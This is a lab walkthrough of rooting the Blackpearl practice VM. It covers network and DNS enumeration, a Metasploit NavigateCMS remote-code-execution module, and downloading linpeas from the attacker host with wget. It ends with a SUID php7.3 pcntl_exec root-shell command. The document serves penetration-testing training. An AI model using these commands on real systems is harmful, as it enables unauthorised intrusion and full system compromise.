IP Adress Identifying
The first step in hacking the Blackpearl Virtual Machine is to identify its IP address. To do this, we will use the ::highlight[sudo arp-scan -l] command, which allows us to scan our network and discover the available IP addresses.
sudo arp-scan -l
In the image provided, we can see two IP addresses: 192.168.1.1, which belongs to the router, and 192.168.1.141 , assigned to the Blackpearl Virtual Machine.
Port Scanning With Nmap
Now that we have identified the IP address of the Blackpearl VM, we can utilize the Nmap tool to scan its ports and identify any open ports and the services running on the machine. To perform this scan, we will use the following command:
nmap -T4 -A -p- 192.168.1.141Here’s a breakdown of the command options:
-T4 : This option sets the timing template for the scan, which ranges from 0 to 5. In this case, we are using 4, which balances speed and accuracy.
-A : This switch enables OS detection and version detection of the services running on the VM.
-p- : This option tells Nmap to scan all ports, providing a comprehensive assessment of the VM's network exposure.
By running this command, we can gather valuable information about the Blackpearl Virtual Machine's security posture. The open ports are shown in the picture below.
The Nmap scan reveals that three ports are open:
Port 80 (HTTP): This indicates that the machine is functioning as a web server.
Port 53 (DNS): This suggests that DNS services are also active on the machine.
Port 22 (SSH): This port is open for secure shell (SSH) access.
Additionally, the scan indicates that the operating system is Linux and that Nginx version 1.14.2 is running on the server.
Info Gathering on port 80
The next step is to visit http://192.168.1.141 to gather more information about the website hosted on this machine.
By right-clicking on the page and selecting "View Source Code" we can access the source code of the webpage. This allows us to search for important comments or any relevant information embedded within the code.
In the source code, we find an important comment:
Webmaster: [email protected]
This suggests that "Alek" may be a user associated with the website, providing a potential lead for further investigation.
The next step in enumerating port 80 is to use the ffuf tool for directory busting. This allows us to discover various directories on the website. We can accomplish this by using the following command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.1.141/FUZZHere’s a breakdown of the command options:
-u: specifies the target URL, with FUZZ indicating where the tool should attempt to insert potential directory names.
-w: specifies the path to the wordlist that ffuf will use to perform the directory busting.
Using the ffuf tool, we discovered a hidden directory on the target server. The tool revealed the following URL:
To see what this directory contains, we will type the URL into our web browser. Upon navigating to the URL, the browser will prompt us to download a file called "secret".
the content of the file is shown in the picture below:
Now that we have completed our enumeration and information gathering on port 80, the next step is to investigate port 53, which is commonly used for DNS services.
Enumerating Port 53
For our next step, we'll use the dnsrecon tool to gather DNS information. dnsrecon is a powerful tool for performing DNS reconnaissance, helping us identify hostnames, IP addresses, and other valuable network information.
The first step for enumeration on port 53 is using the following command:
dnsrecon -r 127.0.0.0/24 -n 192.168.1.141 -d domainnameHere’s a brief explanation of what each part of the command does:
-r 127.0.0.0/24 : Specifies the range of IP addresses for reverse lookups. Replace 127.0.0.0/24 with the actual target network range.
-n 192.168.1.141: Indicates the DNS server to use for the queries. This is set to our target server’s IP address.
-d domainname: Sets the domain name to investigate. Replace domainname with the specific domain you’re targeting.
Using these switches, dnsrecon will help us to gather following DNS information:
The dnsrecon tool reveals that there is a blackpearl.tcm domain associated with the Black Pearl virtual machine. However, if we try to access blackpearl.tcm in our browser, it won't direct us to the Black Pearl virtual machine's DNS. Instead, it may bring up unrelated websites.
This happens because, by default, our system doesn’t know how to resolve the blackpearl.tcm domain to the IP address of the virtual machine. In other words, when we type a domain name into the browser, our system consults the Domain Name System (DNS) to translate that human-readable domain name into a numerical IP address that can be understood by computers. If the DNS server doesn't recognize the domain, it won't be able to direct us correctly.
To resolve this, we need to manually map the domain name to the correct IP address by adding an entry to the /etc/hosts file. This file is used by our system to look up domain names before consulting an external DNS server. By adding the domain name blackpearl.tcm and the corresponding IP address of the virtual machine into this file, we ensure that our system can correctly resolve the domain to the virtual machine. For doing so we will type:
sudo nano /etc/hostsAnd we will add
192.168.1.141 blackpearl.tcm
to the etc/hosts file as it is shown in the picture below.
Now that our /etc/hosts file contains the local IP address associated with blackpearl.tcm, we can open a browser and navigate to
If everything is set up correctly, we should be greeted with the following image:
For further enumeration, we’ll use the ffuf tool to perform directory fuzzing and uncover additional resources on blackpearl.tcm. The following command will help us find hidden directories:
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZThis command uses the wordlist from DirBuster to fuzz the URL and discover directories on the target. As a result of this directory busting, we find a directory named navigate.
Searching for > http://blackpearl.tcm/navigate
will lead us to the following image, which provides valuable information about the platforms being used. In this case, the information can serve as a cue for us to look for relevant exploits related to NavigateCMS.
NavigateCMS Exploit
By searching for "NavigateCMS exploit" on the internet, we can find the Rapid7 website, which provides valuable information about various exploitation techniques.
One method for exploiting NavigateCMS is demonstrated in Metasploit at the following link:
https://www.rapid7.com/db/modules/exploit/multi/http/navigate_cms_rce/
According to the explanations provided on that website, the helpful module in Metasploit for this exploit is called navigate_cms_rce.
Metasploit Navigate_cms_rce Module
To begin, we will launch Metasploit using the command:
msfconsole
Next, we can search for the module by running:
search navigate_cmsAfter locating the module, we will use the command:
use <number of module>This command allows us to select the desired module for exploitation. Using the command options, we can see that two essential inputs must be provided:
-RHOST: which is the IP address of the target
-VHOST: which in this case is blackpearl.tcm
We will set these values using the following commands:
set RHOST 192.168.1.141
set VHOST blackpearl.tcmOnce we've prepared our desired module, we can run the exploit against the virtual machine by typing:
run
After running the Metasploit module, we will use the following command to gain access to a shell on the system.
shellIt's important to note that this module utilizes Meterpreter, which stands for Metasploit's interpreter. The information below provides foundational details about Meterpreter.
Meterpreter Metasploit Interpreter Payload
Overview
Meterpreter is a type of payload used within the Metasploit framework. It provides an interactive shell on the target system and operates entirely in memory (RAM), avoiding the need to write anything to the victim's hard disk. This in-memory execution significantly reduces the attacker's footprint, making it harder for traditional antivirus solutions to detect the presence of Meterpreter.
In-Memory Execution
- Memory Usage: Meterpreter runs within the victim's RAM rather than the hard disk. This means all its operations and files reside in memory.
- Temporary Nature: Since everything in RAM is temporary, all traces of Meterpreter are lost when the target system is turned off or restarted.
Detection by Advanced Security Tools
- Windows Defender ATP: Windows Defender Advanced Threat Protection (ATP) is capable of scanning the RAM. It can detect in-memory threats like Meterpreter by analyzing memory contents and looking for suspicious activities.
Using Meterpreter
- Establishing a Session: Once a Meterpreter session is established, you can interact with the target system's shell by using the
shellcommand.
- Returning to Meterpreter: To return from the system shell to the Meterpreter shell, simply type
exit.
- Command Assistance: To understand which commands are available in the Meterpreter shell, use the
helpcommand.
By using these capabilities, Meterpreter allows for stealthy operations within a compromised system while providing robust functionality for the attacker.
Priviledge Escalation
Now that we have successfully established a shell connection to the target system,we can use important commands to gather information about our user rights. For example, running
whoamishows the result www-data , indicating that we are operating with limited privileges, specifically as the web server user. This suggests that we need to perform privilege escalation to gain higher access.
Shell Capability Enhancement with TTY
Before taking further action, it's beneficial to enhance the shell capabilities using a Python module called TTY shell.
PTY Adavantages
The pty (pseudo-terminal) module in Python allows us to spawn a new pseudo-terminal. This provides several advantages:
- Improved Interaction: A TTY shell enhances the interactivity of the shell. It supports features like job control, arrow key navigation, and terminal resizing, which are not available in a simple shell.
- Better Input/Output Handling: Using a TTY allows for better handling of input and output, enabling more complex interactions with the shell.
To utilize the advantages of TTY, Python must be installed on the target machine. We can confirm its presence by running the command:
which pythonThe above command gives the version of the Python which is installed on the target system which shows that Python is installed, so we can use the following command to obtain a better shell:
python -c 'import pty; pty.spawn("/bin/bash")'The command above does the following:
- python -c: This option allows us to execute Python code directly from the command line.
- 'import pty; pty.spawn("/bin/bash")': This Python code imports the pty module and then spawns a new instance of /bin/bash, which gives us an interactive shell.
Linpeas
One of the great tools used for privilege escalation in Linux distributions is called linpeas.sh. Before we can use it, we need to place linpeas.sh in our desired directory on the attacker machine. Once the script is in the desired location, we can easily host it using the following command:
python -m http.server 80This command starts a simple HTTP server on port 80, allowing us to serve files from the current directory, including linpeas.sh.
Next, in the Meterpreter shell, we need to navigate to the /tmp directory, which stands for "temporary." This directory is commonly writable by normal users, allowing us to download files without requiring elevated privileges.
Now, we can use the following command on the target machine to download linpeas.sh from the attacker machine:
wget http://192.168.1.157/linpeas.sh(Note: 192.168.1.157 is the IP address of the attacker machine in this scenario, which can be determined by using the ifconfig command on the attacker machine.)
After downloading the file, we need to make it executable with the command:
chmod +x linpeas.shFinally, we can run the script using:
./linpeas.shThis tool will help us identify potential privilege escalation vectors on the target machine.
SUID
Once linpeas finishes running, it will display various types of information, but the most relevant part for our scenario is the SUID section.
SUID (Set User ID) is a special permission bit in Unix-like operating systems that allows a user to execute a file with the permissions of the file's owner, typically root. When a file has the SUID permission set (indicated by an S in the permissions string), any user who executes that file can temporarily gain the permissions of the file's owner.
For example, if a file has the permission -rwsr-xr-x , the s in the owner's permission indicates that the SUID bit is set. This means that any user, regardless of their privileges, can run this file and execute it with root privileges.
Below is the specific information that linpeas gathers regarding SUID:
1SUID - Check easy privesc, exploits and write perms
2╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
3strings Not Found
4strace Not Found
5-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
6-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
7-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
8-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
9-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
10-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
11-rwsr-xr-x 1 root root 4.6M Feb 13 2021 /usr/bin/php7.3 (Unknown SUID binary!)
12-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
13-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
14-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
15-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
16-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswdThe presence of SUID binaries can present opportunities for privilege escalation. If any of the listed binaries in the linpeas output can be exploited, a normal user can execute these files and gain elevated privileges.
By analyzing the binaries listed under the SUID section, we can determine if any have known vulnerabilities or can be exploited to escalate our privileges to root. This makes identifying SUID files a crucial step in the process of privilege escalation.
We can use the following command to find all files with the SUID permission set, which may indicate potential privilege escalation vulnerabilities:
find / -type f -perm -4000 2>/dev/nullHere is the breakdown of the Command:
-
find /: This starts the find command, telling it to search the entire filesystem, starting from the root directory (/).
-
type f: This option specifies that we are looking for files only (not directories).
-
perm -4000: This option searches for files that have the SUID permission bit set. The 4 represents the SUID bit, and the - before 4000 indicates that we are looking for files that exactly match this permission.
-
2>/dev/null: This part redirects any error messages (file descriptor 2) to /dev/null, effectively silencing them. This is useful when we want to avoid cluttering the output with permission denied errors or other messages that may occur during the search.
Running this command will return a list of all files on the system that have the SUID bit set. By reviewing this list, we can identify files that might be exploited for privilege escalation. It's important to analyze these files carefully, as not all SUID files are vulnerable, but they could be potential targets depending on their configuration and known exploits.
GTFOBINS
GTFOBins is a great website that provides various privilege escalation commands related to SUID binaries. Among the files we identified with the SUID bit set, PHP was available in the GTFOBins repository at the following link: https://gtfobins.github.io/gtfobins/php/ By utilizing this information, we can escalate our privileges.To escalate our privileges, we can execute the following command:
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"Here is the breakdown of the command:
-
/usr/bin/php7.3 : This specifies the path to the PHP executable that has the SUID bit set, allowing it to run with the permissions of its owner (in this case, root).
-
-r "pcntl_exec('/bin/sh', ['-p']);": This part of the command tells PHP to execute the specified code. The pcntl_exec function allows us to run a new program—in this case, /bin/sh (the shell) with the -p option, which provides a privileged shell.
Why This Command Grants Root Privileges
Since the PHP binary has the SUID bit set, when we execute this command, it runs with root privileges rather than the privileges of the user executing it. This means that the /bin/sh shell we spawn is running as root.
By running this command, we effectively get a root shell, giving us full administrative access to the system. This allows us to perform any actions as the root user, such as modifying files, changing configurations, or accessing sensitive information.
Blackpearl Hacked
By leveraging the SUID set on the PHP binary and the capabilities of the pcntl_exec function, we can gain elevated privileges and obtain a root shell, which is a significant advantage in a penetration testing or exploitation scenario. The following shows that the box is rooted successfully.